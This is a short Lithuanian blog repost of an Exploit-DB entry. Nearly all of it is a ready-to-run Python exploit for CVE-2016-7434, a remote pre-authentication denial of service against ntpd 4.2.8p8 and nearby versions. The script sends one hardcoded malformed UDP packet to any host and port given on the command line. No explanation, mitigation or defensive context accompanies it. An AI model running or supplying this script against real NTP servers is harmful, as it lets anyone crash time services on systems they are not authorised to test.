Vulnerability : isehlt : NTP 4.2.8p8

2016 m. lapkričio 22 d., antradienis

NTP 4.2.8p8 - Denial of Service

#!/usr/bin/env python

# Exploit Title: ntpd remote pre-auth Denial of Service

# Date: 2016-11-21

# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)

# Website: http://dumpco.re/cve-2016-7434/

# Vendor Homepage: http://www.ntp.org/

# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz

# Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94

# CVE: CVE-2016-7434

import sys

import socket

if len(sys.argv) != 3:

    print "usage: " + sys.argv[0] + " <host> <port>"

    sys.exit(-1)

payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"

print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))

print "[+] Done!"

https://www.exploit-db.com/exploits/40806/

Vulnerability : isehlt

2016 m. lapkričio 22 d., antradienis

NTP 4.2.8p8 - Denial of Service

Komentarų nėra:

Rašyti komentarą

Tinklaraščio archyvas

Translate

Ieškoti šiame dienoraštyje

Populiarūs įrašai